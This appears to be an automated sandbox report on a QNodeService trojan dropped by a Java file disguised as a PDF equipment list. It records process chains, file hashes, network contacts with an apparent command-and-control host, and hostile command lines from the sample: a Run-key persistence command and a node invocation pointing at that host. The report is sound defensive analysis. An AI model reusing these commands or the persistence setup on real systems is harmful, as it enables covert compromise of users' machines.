Malware Analysis Report

2024-10-19 10:30

Sample ID 201005-djf6l11372
Target list of equipment_puma_pdf.jar
SHA256 0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6
Tags
trojan qnodeservice persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6

Threat Level: Known bad

The file list of equipment_puma_pdf.jar was found to be: Known bad.

Malicious Activity Summary

trojan qnodeservice persistence

QNodeService

Executes dropped EXE

Adds Run key to start application

JavaScript code in executable

Looks up external IP address via web service

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2020-10-05 13:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2020-10-05 13:14

Reported

2020-10-05 13:16

Platform

win7

Max time kernel

3s

Max time network

16s

Command Line

java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"

Signatures

N/A

Processes

C:\Windows\system32\java.exe

java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2020-10-05 13:14

Reported

2020-10-05 13:16

Platform

win10v200722

Max time kernel

128s

Max time network

132s

Command Line

java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"

Signatures

QNodeService

trojan qnodeservice

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\8aa35a81-23a1-45e0-be91-c4ef6db99f6f = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" C:\Windows\system32\reg.exe N/A

JavaScript code in executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A wtfismyip.com N/A N/A
N/A wtfismyip.com N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\node-v14.12.0-win-x64\node.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3956 wrote to memory of 3516 N/A C:\ProgramData\Oracle\Java\javapath\java.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3956 wrote to memory of 3516 N/A C:\ProgramData\Oracle\Java\javapath\java.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3516 wrote to memory of 3580 N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3516 wrote to memory of 3580 N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3580 wrote to memory of 788 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3580 wrote to memory of 788 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 788 wrote to memory of 3184 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 788 wrote to memory of 3184 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3184 wrote to memory of 2180 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Windows\system32\cmd.exe
PID 3184 wrote to memory of 2180 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Windows\system32\cmd.exe
PID 2180 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2180 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\ProgramData\Oracle\Java\javapath\java.exe

java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\3356b8c6.tmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain empefarm.ddns.net

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js --hub-domain empefarm.ddns.net

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js --hub-domain empefarm.ddns.net

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8aa35a81-23a1-45e0-be91-c4ef6db99f6f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""

C:\Windows\system32\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8aa35a81-23a1-45e0-be91-c4ef6db99f6f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 nodejs.org udp
N/A 104.20.23.46:443 nodejs.org tcp
N/A 8.8.8.8:53 empefarm.ddns.net udp
N/A 185.245.84.137:443 empefarm.ddns.net tcp
N/A 185.245.84.137:443 empefarm.ddns.net tcp
N/A 185.245.84.137:443 empefarm.ddns.net tcp
N/A 185.245.84.137:443 empefarm.ddns.net tcp
N/A 8.8.8.8:53 wtfismyip.com udp
N/A 95.217.228.176:443 wtfismyip.com tcp

Files

memory/3516-51-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3356b8c6.tmp

MD5 9d5548aa1a52a4fd8cc9ad1c64a23a09
SHA1 72474bd84027c0aa72b09c3f48e1c57ecf935bb2
SHA256 0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6
SHA512 c73296d0b6cd972a90eef0e7a4c32874cf190cf2d545f2f1338ce2d3bf7dfc784a46bf514be6b7d2ebb92124e610c86667a53f7d3ebe5c31a5791a6ef8e90eb6

C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3580-161-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/3580-163-0x000000AF59080000-0x000000AF59081000-memory.dmp

memory/788-164-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/788-166-0x0000001D75AC0000-0x0000001D75AC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js

MD5 c686d5fcf94d07f7cee70109eba9c4d3
SHA1 588eee04fdbf1fa372c8389c66d581e0b37afd7e
SHA256 e7e4897c0bbcd7e2931011f7839a0ebe920dc14e116fb898fc5e318827dc425d
SHA512 5af3b52daafe41bf891dcd846c3b8c15c04d1da2cdb28c915cf970f2fbe3d7bba6b6fc7c291a431a2d0a437f159322401eb8aa567a146763d665ca76677853a3

memory/3184-168-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/3184-170-0x000000A1111C0000-0x000000A1111C1000-memory.dmp

memory/2180-171-0x0000000000000000-mapping.dmp

memory/1648-172-0x0000000000000000-mapping.dmp